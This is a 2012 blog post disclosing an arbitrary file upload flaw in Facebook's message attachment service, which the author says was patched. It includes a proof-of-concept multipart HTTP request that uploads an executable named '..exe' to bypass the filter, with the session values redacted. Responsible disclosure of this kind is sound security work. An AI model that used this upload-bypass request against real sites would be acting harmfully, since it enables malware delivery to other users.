Friday, May 11, 2012

Facebook Bug #3: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068
Accept-Encoding: gzip, deflate
Host: attachments.facebook.com
Content-Length: 194182
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [information removed]

-----------------------------7db2e171a0068
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="attachment"; filename="..exe"
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.